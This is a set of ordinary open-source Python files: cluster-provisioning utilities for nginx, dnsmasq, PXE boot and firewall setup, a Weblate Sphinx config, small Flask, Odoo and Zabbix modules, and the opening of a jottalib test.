col_idx[hdr] = col
break
return col_idx
def nginx_modify_conf(conf_path, directives={}, locations={}, reload=True,
clear=False):
"""Create/modify nginx configuration file
Directives are defined in a dictionary, e.g.:
directives={'listen': 80', 'server_name': 'powerup'}
Locations are defined in a dictionary with values as strings or
lists, e.g.:
locations={'/': ['root /srv', 'autoindex on'],
'/cobbler': 'alias /var/www/cobbler'}
*note: Semicolons (;) are auto added if not present
Args:
conf_path (str): Path to nginx configuration file
directives (dict, optional): Server directives
locations (dict, optional): Location definitions
reload (bool, optional): Reload nginx after writing config
clear (bool, optional): Remove any existing configuration data
Returns:
int: Return code from nginx syntax check ('nginx -t')
If syntax check rc=0 and reload=True the return code
from 'systemctl restart nginx.service'
"""
collecting_directive_data = False
collecting_location_data = False
current_location = None
if not clear and os.path.isfile(conf_path):
LOG.debug(f"Loading existing nginx config: '{conf_path}")
with open(conf_path, 'r') as file_object:
for line in file_object:
if 'server {' in line:
collecting_directive_data = True
elif not line.strip():
continue # continue if blank line
elif 'location' in line:
collecting_directive_data = False
current_location = line.strip()[9:-2]
if current_location not in locations:
collecting_location_data = True
locations[current_location] = []
else:
current_location = None
elif '}' in line and collecting_location_data:
collecting_location_data = False
current_location = None
elif collecting_location_data:
locations[current_location].append(line.strip())
elif '}' in line and collecting_directive_data:
collecting_directive_data = False
elif collecting_directive_data:
data_split = line.split(maxsplit=1)
if data_split[0] not in directives:
directives[data_split[0]] = data_split[1].strip()
LOG.debug(f"Writing nginx config: '{conf_path}")
with open(conf_path, 'w') as file_object:
file_object.write('server {\n')
for key, value in directives.items():
if not value.endswith(';'):
value = value + ';'
file_object.write(f' {key} {value}\n')
for key, value_list in locations.items():
file_object.write(f' location {key} ' + '{\n')
if type(value_list) is str:
value_list = value_list.split('\n')
for value in value_list:
if not value.endswith(';'):
value = value + ';'
file_object.write(f' {value}\n')
file_object.write(' }\n')
file_object.write('}\n')
cmd = (f'nginx -t')
stdout, stderr, rc = sub_proc_exec(cmd)
LOG.debug(f"Command: \'{cmd}\'\nstdout: \'{stdout}\'\n"
f"stderr: \'{stderr}\'\nrc: {rc}")
if rc != 0:
LOG.warning('Nginx configuration check failed')
elif reload:
cmd = ('systemctl restart nginx.service')
stdout, stderr, rc = sub_proc_exec(cmd)
LOG.debug(f"Command: \'{cmd}\'\nstdout: \'{stdout}\'\n"
f"stderr: \'{stderr}\'\nrc: {rc}")
if rc != 0:
LOG.warning('Nginx failed to start')
return rc
def dnsmasq_add_dhcp_range(dhcp_range,
lease_time='1h',
conf_path='/etc/dnsmasq.conf',
reload=True):
"""Add DHCP range to existing dnsmasq configuration
Args:
dhcp_range (str, optional): Range of IP addresses to lease to clients
formatted as "<start_ip>,<end_ip>"
lease_time (str, optional): Time duration of IP leases
conf_path (str, optional): Path to dnsmasq configuration file
reload (bool, optional): Reload dnsmasq after writing config
Returns:
int: Return code from nginx syntax check ('dnsmasq --test')
If syntax check rc=0 and reload=True the return code
from 'systemctl restart dnsmasq.service'
"""
append_line(conf_path, f'dhcp-range={dhcp_range},{lease_time}',
check_exists=True)
cmd = (f'dnsmasq --test')
stdout, stderr, rc = sub_proc_exec(cmd)
LOG.debug(f"Command: \'{cmd}\'\nstdout: \'{stdout}\'\n"
f"stderr: \'{stderr}\'\nrc: {rc}")
if rc != 0:
LOG.warning('dnsmasq configuration check failed')
elif reload:
cmd = ('systemctl restart dnsmasq.service')
stdout, stderr, rc = sub_proc_exec(cmd)
LOG.debug(f"Command: \'{cmd}\'\nstdout: \'{stdout}\'\n"
f"stderr: \'{stderr}\'\nrc: {rc}")
if rc != 0:
LOG.error('dnsmasq service restart failed')
return rc
def dnsmasq_config_pxelinux(interface=None,
dhcp_range=None,
lease_time='1h',
default_route=None,
tftp_root=None,
disable_dns=False,
conf_path='/etc/dnsmasq.conf',
reload=True):
"""Create dnsmasq configuration to support PXE boots
*note*: This is overwrite any existing configuration located at
'conf_path'!
Args:
interface (str, optional): Only listen for requests on given interface
dhcp_range (str, optional): Range of IP addresses to lease to clients
formatted as "<start_ip>,<end_ip>"
lease_time (str, optional): Time duration of IP leases
default_route (str, optional): IP pushed to clients as default route
tftp_root (str, optional): TFTP root directory path
disable_dns (bool, optional): Disable DNS functionality
conf_path (str, optional): Path to dnsmasq configuration file
reload (bool, optional): Reload dnsmasq after writing config
Returns:
int: Return code from nginx syntax check ('dnsmasq --test')
If syntax check rc=0 and reload=True the return code
from 'systemctl restart dnsmasq.service'
"""
if tftp_root is None:
if 'rhel' in linux_distribution(full_distribution_name=False):
tftp_root = '/var/lib/tftpboot'
if 'ubuntu' in linux_distribution(full_distribution_name=False):
tftp_root = '/tftpboot'
backup_file(conf_path)
with open(conf_path, 'w') as file_object:
file_object.write(
"# POWER-Up generated configuration file for dnsmasq\n\n")
if interface is not None:
file_object.write(f"interface={interface}\n\n")
file_object.write(dedent(f"""\
dhcp-lease-max=1000
dhcp-authoritative
dhcp-boot=pxelinux.0
enable-tftp
tftp-root={tftp_root}
user=root
\n"""))
if default_route is not None:
file_object.write(f"dhcp-option=3,{default_route}\n\n")
if dhcp_range is not None:
file_object.write(f"dhcp-range={dhcp_range},{lease_time}\n")
if disable_dns:
file_object.write("port=0\n")
cmd = (f'dnsmasq --test')
stdout, stderr, rc = sub_proc_exec(cmd)
LOG.debug(f"Command: \'{cmd}\'\nstdout: \'{stdout}\'\n"
f"stderr: \'{stderr}\'\nrc: {rc}")
if rc != 0:
LOG.warning('dnsmasq configuration check failed')
elif reload:
cmd = 'systemctl enable dnsmasq.service'
resp, err, rc = sub_proc_exec(cmd)
if rc != 0:
LOG.error('Failed to enable dnsmasq service')
cmd = 'systemctl restart dnsmasq.service'
stdout, stderr, rc = sub_proc_exec(cmd)
LOG.debug(f"Command: \'{cmd}\'\nstdout: \'{stdout}\'\n"
f"stderr: \'{stderr}\'\nrc: {rc}")
if rc != 0:
LOG.error('dnsmasq service restart failed')
return rc
def pxelinux_set_default(server,
kernel,
initrd,
kickstart=None,
kopts=None,
dir_path=None):
"""Create default pxelinux profile
This function assumes that the server is hosting the kernel,
initrd, and kickstart (if specified) over http. The default
'dir_path' requires root access.
Args:
server (str): IP or hostname of http server hosting files
kernel (str): HTTP path to installer kernel
initrd (str): HTTP path to installer initrd
kickstart (str, optional): HTTP path to installer kickstart
kopts (str, optional): Any additional kernel options
dir_path (str, optional): Path to pxelinux directory
"""
if dir_path is None:
if 'rhel' in linux_distribution(full_distribution_name=False):
dir_path = '/var/lib/tftpboot/pxelinux.cfg/'
if 'ubuntu' in linux_distribution(full_distribution_name=False):
dir_path = '/tftpboot/pxelinux.cfg/'
kopts_base = (f"ksdevice=bootif lang= kssendmac text")
if kickstart is not None:
if 'ubuntu' in kernel.lower():
ks_key = 'url'
else:
ks_key = 'ks'
kopts_base += f" {ks_key}=http://{server}/{kickstart}"
if kopts is not None:
kopts = kopts_base + f" {kopts}"
else:
kopts = kopts_base
default = os.path.join(dir_path, 'default')
os.makedirs(dir_path, exist_ok=True)
with open(default, 'w') as file_object:
file_object.write(dedent(f"""\
DEFAULT {kernel.split('/')[1]}
LABEL local
MENU LABEL (local)
MENU DEFAULT
LOCALBOOT -1
LABEL {kernel.split('/')[1]}
MENU LABEL PXE Install: {kernel.split('/')[1]}
KERNEL http://{server}/{kernel}
INITRD http://{server}/{initrd}
IPAPPEND 2
APPEND {kopts}
"""))
def pxelinux_set_local_boot(dir_path=None):
"""Disable PXE install by setting boot device to 'local'
Args:
dir_path (str, optional): Path to pxelinux directory
"""
if dir_path is None:
if 'rhel' in linux_distribution(full_distribution_name=False):
dir_path = '/var/lib/tftpboot/pxelinux.cfg/'
if 'ubuntu' in linux_distribution(full_distribution_name=False):
dir_path = '/tftpboot/pxelinux.cfg/'
replace_regex(os.path.join(dir_path, 'default'),
r'^DEFAULT.*$', 'DEFAULT local')
def firewall_add_services(services):
"""Add services to be allowed in firewall rules
Args:
services (str or list): Service(s) to be permanently allowed
Returns:
int: Binary error code
"""
if type(services) is str:
services = [services]
fw_err = 0
if 'rhel' in linux_distribution(full_distribution_name=False):
firewall_service = 'firewalld.service'
firewall_enable_cmd = 'firewall-cmd --permanent --add-service='
firewall_reload_cmd = 'firewall-cmd --reload'
elif 'ubuntu' in linux_distribution(full_distribution_name=False):
firewall_service = 'ufw.service'
firewall_enable_cmd = 'ufw allow '
firewall_reload_cmd = 'true'
return 0 # TODO: Need to add firewall configuration for Ubuntu
cmd = f'systemctl status {firewall_service}'
resp, err, rc = sub_proc_exec(cmd)
if 'Active: active (running)' in resp.splitlines()[2]:
LOG.debug('Firewall is running')
else:
cmd = f'systemctl enable {firewall_service}'
resp, err, rc = sub_proc_exec(cmd)
if rc != 0:
fw_err += 1
LOG.error('Failed to enable firewall service')
cmd = f'systemctl start {firewall_service}'
resp, err, rc = sub_proc_exec(cmd)
if rc != 0:
fw_err += 10
LOG.error('Failed to start firewall')
for service in services:
cmd = f'{firewall_enable_cmd}{service}'
resp, err, rc = sub_proc_exec(cmd)
if rc != 0:
fw_err += 100
LOG.error(f'Failed to enable {service} service on firewall')
resp, err, rc = sub_proc_exec(firewall_reload_cmd)
if 'success' not in resp:
fw_err += 1000
LOG.error('Error attempting to restart firewall')
return fw_err
def extract_iso_image(iso_path, dest_dir):
"""Extract ISO image into directory
If a (non-empty) directory matching the iso file already exists in
the destination directory extraction is not attempted.
Args:
iso_path (str): Path to ISO file
dest_dir (str): Path to an existing directory that the ISO will
be extracted into. A subdirectory matching the
image filename will be created.
Returns:
tuple: ('str: Relative path to kernel',
'str: Relative path to initrd')
Raises:
UserException: iso_path is not a valid file path
iso_path does not end in '.iso'
can't find kernel or initrd in extracted image
"""
if not os.path.isfile(iso_path):
raise UserException(f"Invalid iso_path: '{iso_path}")
elif not iso_path.lower().endswith('.iso'):
raise UserException(f"File does not end with '.iso': '{iso_path}'")
name = os.path.basename(iso_path)[:-4]
iso_dir = os.path.join(dest_dir, name)
if not os.path.isdir(iso_dir):
os.makedirs(iso_dir)
if len(os.listdir(iso_dir)) == 0:
bash_cmd(f'xorriso -osirrox on -indev {iso_path} -extract / {iso_dir}')
bash_cmd(f'chmod 755 {iso_dir}')
filename_parsed = {item.lower() for item in name.split('-')}
kernel = None
initrd = None
if {'ubuntu', 'amd64'}.issubset(filename_parsed):
sub_path = 'install/netboot/ubuntu-installer/amd64'
kernel = os.path.join(name, sub_path, 'linux')
initrd = os.path.join(name, sub_path, 'initrd.gz')
if not os.path.isfile(kernel):
sub_path = 'casper'
kernel = os.path.join(name, sub_path, 'vmlinux')
initrd = os.path.join(name, sub_path, 'initrd')
elif {'ubuntu', 'ppc64el'}.issubset(filename_parsed):
sub_path = 'install/netboot/ubuntu-installer/ppc64el'
kernel = os.path.join(name, sub_path, 'vmlinux')
initrd = os.path.join(name, sub_path, 'initrd.gz')
elif ({'rhel', 'x86_64'}.issubset(filename_parsed) or
{'centos', 'x86_64'}.issubset(filename_parsed)):
sub_path = 'images/pxeboot'
kernel = os.path.join(name, sub_path, 'vmlinuz')
initrd = os.path.join(name, sub_path, 'initrd.img')
elif ({'rhel', 'ppc64le'}.issubset(filename_parsed) or
{'centos', 'ppc64le'}.issubset(filename_parsed)):
sub_path = 'ppc/ppc64'
kernel = os.path.join(name, sub_path, 'vmlinuz')
initrd = os.path.join(name, sub_path, 'initrd.img')
if not os.path.isfile(os.path.join(dest_dir, kernel)):
kernel = None
if not os.path.isfile(os.path.join(dest_dir, initrd)):
initrd = None
# If kernel or initrd isn't in the above matrix search for them
if kernel is None or initrd is None:
kernel_names = {'linux', 'vmlinux', 'vmlinuz'}
initrd_names = {'initrd.gz', 'initrd.img', 'initrd'}
for dirpath, dirnames, filenames in os.walk(iso_dir):
if kernel is None and not kernel_names.isdisjoint(set(filenames)):
rel_dir = os.path.relpath(dirpath, dest_dir)
kernel = (os.path.join(
rel_dir, kernel_names.intersection(set(filenames)).pop()))
if initrd is None and not initrd_names.isdisjoint(set(filenames)):
rel_dir = os.path.relpath(dirpath, dest_dir)
initrd = (os.path.join(
rel_dir, initrd_names.intersection(set(filenames)).pop()))
if kernel is not None and initrd is not None:
break
if kernel is None or initrd is None:
raise UserException("Unable to find kernel and/or initrd in ISO image:"
f" kernel: '{kernel}' initrd: '{initrd}'")
return kernel, initrd
def timestamp():
return datetime.datetime.now().strftime("%d-%h-%Y-%H-%M-%S")
def sha1sum(file_path):
""" Calculate sha1 checksum of single file
Args:
file_path (str): Path to file
Returns:
str: sha1 checksum
"""
sha1sum = hashlib.sha1()
with open(file_path, 'rb') as file_object:
for block in iter(lambda: file_object.read(sha1sum.block_size), b''):
sha1sum.update(block)
return sha1sum.hexdigest()
def md5sum(file_path):
""" Calculate md5 checksum of single file
Args:
file_path (str): Path to file
Returns:
str: md5 checksum
"""
md5sum = hashlib.md5()
with open(file_path, 'rb') as file_object:
for block in iter(lambda: file_object.read(md5sum.block_size), b''):
md5sum.update(block)
return md5sum.hexdigest()
def clear_curses():
""" Curses cleanup
Reset terminal normal mode after running curses application
"""
from curses import nocbreak, echo, endwin
nocbreak()
echo()
endwin()
def interact(**kwargs):
""" Wrapper for code.interact with curses cleanup
Args:
**kwargs: See code.interact documentation
"""
import code
clear_curses()
code.interact(**kwargs)
def breakpoint():
""" Wrapper for pdb.set_trace() with curses cleanup
Note: python>=3.7 includes a built-in 'breakpoint()'
"""
from pdb import set_trace
from _curses import error
try:
clear_curses()
except error:
pass
set_trace()
def parse_pypi_filenames(filenames):
"""Returns the basename and version for a pypi package name filelist.
Args:
filenames(list): Package filenames of form named-ver-bld.type. Package
names can have dashes or underscores. Filenames can also have underscores
or dashes which don't alwys match the package names
returns:
"""
if isinstance(filenames, list):
_dict = {}
for _file in filenames:
if _file.endswith('.whl') or _file.endswith('.gz') or \
_file.endswith('.bz2') or _file.endswith('.zip'):
fnd = re.search(r'[-=]((\d+\.)+\d+)[-.]', _file)
if fnd:
ver = fnd.group(1)
name = _file[:fnd.span()[0]] # strip trailing eq_eq chars
name = name.lower()
bld = _file[fnd.span()[1]:]
else:
ver = ''
bld = ''
name = _file
LOG.error(f'Unable to extract version from {_file}')
if name in _dict:
_dict[name]['ver_bld'].append((ver, bld))
else:
_dict[name] = {}
_dict[name]['ver_bld'] = [(ver, bld)]
return _dict
def parse_conda_filenames(filenames):
"""Returns the basename, version and release for a conda package file list.
list elements must be of form <name>-<version>-<build>.tar.bz2. Dashes must
appear on both sides of the version and may appear in the name , but nowhere
else.
Args:
filenames(list): list of filenames.
Returns:
dictionary of form: {basename: {'ver': version, 'rel': release lvl}}
"""
def get_parts(filename):
"""Returns the basename, version and release for a conda package file.
of the form basename-ver-release.tar.bz2.
"""
filename = filename.strip()
if not '.tar.bz2' == filename[-8:]:
LOG.error(f'Improper conda filename: {filename}. Missing ".tar.bz2"')
name = ''
version = ''
build = ''
else:
filename = filename[:-8]
_split = filename.rsplit('-', 1)
build = _split[-1]
_split = _split[0].rsplit('-', 1)
version = _split[-1]
name = _split[0]
return name, version, build
if isinstance(filenames, list):
_dict = {}
for _file in filenames:
name, version, build = get_parts(_file)
if name not in _dict:
_dict[name] = {}
_dict[name]['ver_bld'] = []
_dict[name]['ver_bld'].append((version, build))
return _dict
elif isinstance(filenames, str):
return get_parts(filenames)
def get_rpm_info(filelist, _dir):
def get_parts(info):
name = ep = ver = rel = ''
if 'Name' in info:
name = info.split('Name', 1)[-1].lstrip(' :')
name = name[:name.index('\n')]
else:
LOG.error(f'Name not found in rpm package info {info}')
if 'Epoch' in info:
ep = info.split('Epoch', 1)[-1].lstrip(' :')
ep = ep[:ep.index('\n')]
if 'Version' in info:
ver = info.split('Version', 1)[-1].lstrip(' :')
ver = ver[:ver.index('\n')]
if 'Release' in info:
rel = info.split('Release', 1)[-1].lstrip(' :')
rel = rel[:rel.index('\n')]
return name, ep, ver, rel
if isinstance(filelist, list):
_dict = {}
for _file in filelist:
path = os.path.join(_dir, _file)
cmd = f'rpm -qip {path}'
resp, err, rc = sub_proc_exec(cmd)
if rc != 0:
LOG.error(f'Error querying package {path}')
name, ep, ver, rel = get_parts(resp)
if name in _dict:
if ep > _dict[name]['ep']:
_dict[name]['ver'] = ver
_dict[name]['rel'] = rel
_dict[name]['ep'] = ep
elif rel > _dict[name]['rel'] and ver == _dict[name]['ver']:
_dict[name]['rel'] = rel
elif ver > _dict[name]['ver']:
_dict[name]['ver'] = ver
_dict[name]['rel'] = rel
else:
_dict[name] = {}
_dict[name]['ep'] = ep
_dict[name]['ver'] = ver
_dict[name]['rel'] = rel
return _dict
def parse_rpm_filenames(filename, form='list'):
""" returns the basename, epoch, version and release lvl for an rpm file
If form is set to 'list', the components are returned as lists.
If filename is a string, the components are returned as strings.
if form is set to 'dict', a dictionary is returned. The keys are the
basenames, the values are a dictionary with keys: ep, ver, rel.
{basename: {'ep': epoch, 'ver': version, 'rel': release}} where
epoch, version and release are strings.
Args:
filename (str or list)
form
Returns basename and version
"""
def get_parts(_filename):
""" Return a basename, epoch, version and release from a filename of
form: basename-epoch:version-release.type.rpm
The trailing .rpm is optional. If only a basename is present,
the epoch, version and release are returned as empty strings.
The parsing algorithm assumes that the filenames reasonably follow
the rpm naming convention: dashes are only allowed in the basename,
not in the epoch, version or release, and dashes separate the version
from the release level and the basename from the epoch:version where
epoch is optional. If epoch is present it is separated from the release
by a ':'. The algorithm parses right to left.
"""
_filename = _filename.rstrip('.rpm')
_file_nt = _filename.rsplit('.', 1)[0] # drop the type (ie ppc64le)
if _filename != _file_nt:
tmp = _file_nt.rsplit('-', 1)
if len(tmp) > 1:
rel = tmp[-1]
else:
rel = ''
_file_nr = tmp[0]
tmp = _file_nr.rsplit('-', 1)
if len(tmp) > 1:
ver = tmp[1].split(':')[-1]
if ':' in tmp[-1]:
ep = tmp[1].split(':')[0]
else:
ep = ''
else:
ep = ''
ver = ''
basename = tmp[0]
else: # basename only
basename = _file
ver = ''
rel = ''
ep = ''
return basename, ep, ver, rel
if isinstance(filename, str):
return get_parts(filename)
elif form == 'list':
basename = []
version = []
release = []
epoch = []
for _file in filename:
bn, ep, ver, rel = get_parts(_file)
basename.append(bn)
version.append(ver)
release.append(rel)
epoch.append(ep)
return basename, epoch, version, release
elif form == 'dict':
_dict = {}
for _file in filename:
basename, ep, ver, rel = get_parts(_file)
if basename not in _dict:
_dict[basename] = {}
_dict[basename]['ver'] = ver
_dict[basename]['rel'] = rel
_dict[basename]['ep'] = ep
else: # if already in dict, replace if newer
if ep > _dict[basename]['ep']:
_dict[basename]['ver'] = ver
_dict[basename]['rel'] = rel
_dict[basename]['ep'] = ep
elif rel > _dict[basename]['rel'] and ver == _dict[basename]['ver']:
_dict[basename]['rel'] = rel
elif ver > _dict[basename]['ver']:
_dict[basename]['ver'] = ver
_dict[basename]['rel'] = rel
# print(i, _file, basename, ver, rel)
return _dict
else:
epoch = None
basename = None
version = None
return basename, epoch, version, release
def lscpu():
""" Get 'lscpu' output as dictionary
Returns:
dict: Output from 'lscpu'
"""
stdout, stderr, returncode = sub_proc_exec('lscpu')
lscpu_dict = {}
for line in stdout.splitlines():
split = line.split(':', 1)
lscpu_dict[split[0].strip()] = split[1].strip()
return lscpu_dict
def load_package_list_from_file(file_path):
""" Read and format software package list from file
Each software package should be listed on a separate line. This
function is designed to process output from
'pip list --format freeze' or lists of yum packages.
Args:
file_path (str): Path to package list text file
Returns:
str: List of packages separated by single spaces
"""
pkg_list = ''
with open(file_path) as file_object:
for line in file_object:
pkg_list += f' {line.rstrip()}'
return pkg_list.lstrip()
def get_and_create_dir(path=None):
""" Prompt for dir path and create it if needed
Prompt loops until valid path is entered.
Args:
path (str, optional): Text pre-loaded into prompt. If 'None' it
is set to current working dir.
Returns:
str: Validated directory path
"""
if path is None:
path = os.getcwd()
while True:
path = rlinput('Enter an absolute directory location: ', path)
if os.path.exists(path):
if os.path.isdir(path):
return path
else:
print(f"'{path}' is not a directory!")
elif get_yesno(f"'{path}' does not exist, create it? ", default='y'):
try:
os.makedirs(path)
return path
except OSError as exc:
print(f"Error: Failed to create '{path}' - {exc}")
| open-power-ref-design-toolkit/cluster-genesis | scripts/python/lib/utilities.py | Python | apache-2.0 | 68,079 |
# -*- coding: utf-8 -*-
#
# Weblate documentation build configuration file, created by
# sphinx-quickstart on Wed Mar 7 14:48:43 2012.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
from __future__ import unicode_literals
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
sys.path.append(
os.path.abspath(os.path.join(os.path.dirname(__file__), "_ext"))
)
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'djangodocs',
'sphinxcontrib.httpdomain',
'sphinx.ext.graphviz',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Weblate'
copyright = '2012 - 2016, Michal Čihař'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2.9'
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Weblatedoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'Weblate.tex', 'Weblate Documentation',
'Michal Čihař', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('wlc', 'wlc', 'Weblate Client Documentation',
['Michal Čihař'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Weblate', 'Weblate Documentation',
'Michal Čihař', 'Weblate', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = 'Weblate Documentationt'
epub_author = 'Michal Čihař'
epub_publisher = 'Michal Čihař'
epub_copyright = '2012 - 2016, Michal Čihař'
# The basename for the epub file. It defaults to the project name.
#epub_basename = 'project'
# The HTML theme for the epub output. Since the default themes are not optimized
# for small screen space, using the same theme for HTML and epub output is
# usually not wise. This defaults to 'epub', a theme designed to save visual
# space.
#epub_theme = 'epub'
epub_theme_options = {
'relbar1': False,
'footer': False,
}
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
epub_cover = ('_static/weblate.png', 'epub-cover.html')
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#epub_tocscope = 'default'
# Fix unsupported image types using the PIL.
#epub_fix_images = False
# Scale large images.
#epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#epub_show_urls = 'inline'
# If false, no index is generated.
#epub_use_index = True
graphviz_output_format = 'svg'
| dtschan/weblate | docs/conf.py | Python | gpl-3.0 | 10,574 |
from .. import app
from flask_sqlalchemy import SQLAlchemy
# Introduce the database.
db = SQLAlchemy(app)
| AndrewNeudegg/CIMC | CIMC/database/__init__.py | Python | mit | 107 |
# -*- coding: utf-8 -*-
# Copyright 2013-2017 Pedro M. Baeza <[email protected]>
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl.html).
from odoo import models, api
class BetterZipGeonamesImport(models.TransientModel):
_inherit = 'better.zip.geonames.import'
@api.model
def transform_city_name(self, city, country):
"""Change determinants casing."""
if country.code == 'ES':
return city.replace(' De ', ' de ').replace(' Del ', ' del ').\
replace(' La ', ' la ').replace(' Las ', ' las ').\
replace(' El ', ' el ').replace(' Los ', ' los ')
else:
return super(BetterZipGeonamesImport, self).transform_city_name(
city, country)
@api.model
def select_or_create_state(self, row, country, code_row_index=4,
name_row_index=3):
if country.code == 'ES':
code_row_index = 6
name_row_index = 5
return super(BetterZipGeonamesImport, self).select_or_create_state(
row, country, code_row_index=code_row_index,
name_row_index=name_row_index)
| factorlibre/l10n-spain | l10n_es_toponyms/wizard/geonames_import.py | Python | agpl-3.0 | 1,168 |
from api.mon.backends.zabbix.monitor import Zabbix, get_zabbix, del_zabbix
from api.mon.backends.zabbix.server import ZabbixMonitoringServer
get_monitoring = get_zabbix
del_monitoring = del_zabbix
MonitoringBackendClass = Zabbix
MonitoringServerClass = ZabbixMonitoringServer
__all__ = ('get_monitoring', 'del_monitoring', 'MonitoringBackendClass', 'MonitoringServerClass')
| erigones/esdc-ce | api/mon/backends/zabbix/__init__.py | Python | apache-2.0 | 379 |
#!/usr/bin/env python
# -*- coding: utf-8
import os
import sys
from jottalib.monitor import ArchiveEventHandler
def test_correct_url(tmpdir):
tmpdir = str(tmpdir)
aeh = ArchiveEventHandler(None, tmpdir, "/TEST_ROOT")
filepath = os.path.join(tmpdir, "subdir", "correct_url.txt")
jottapath = aeh.get_jottapath(filepath)
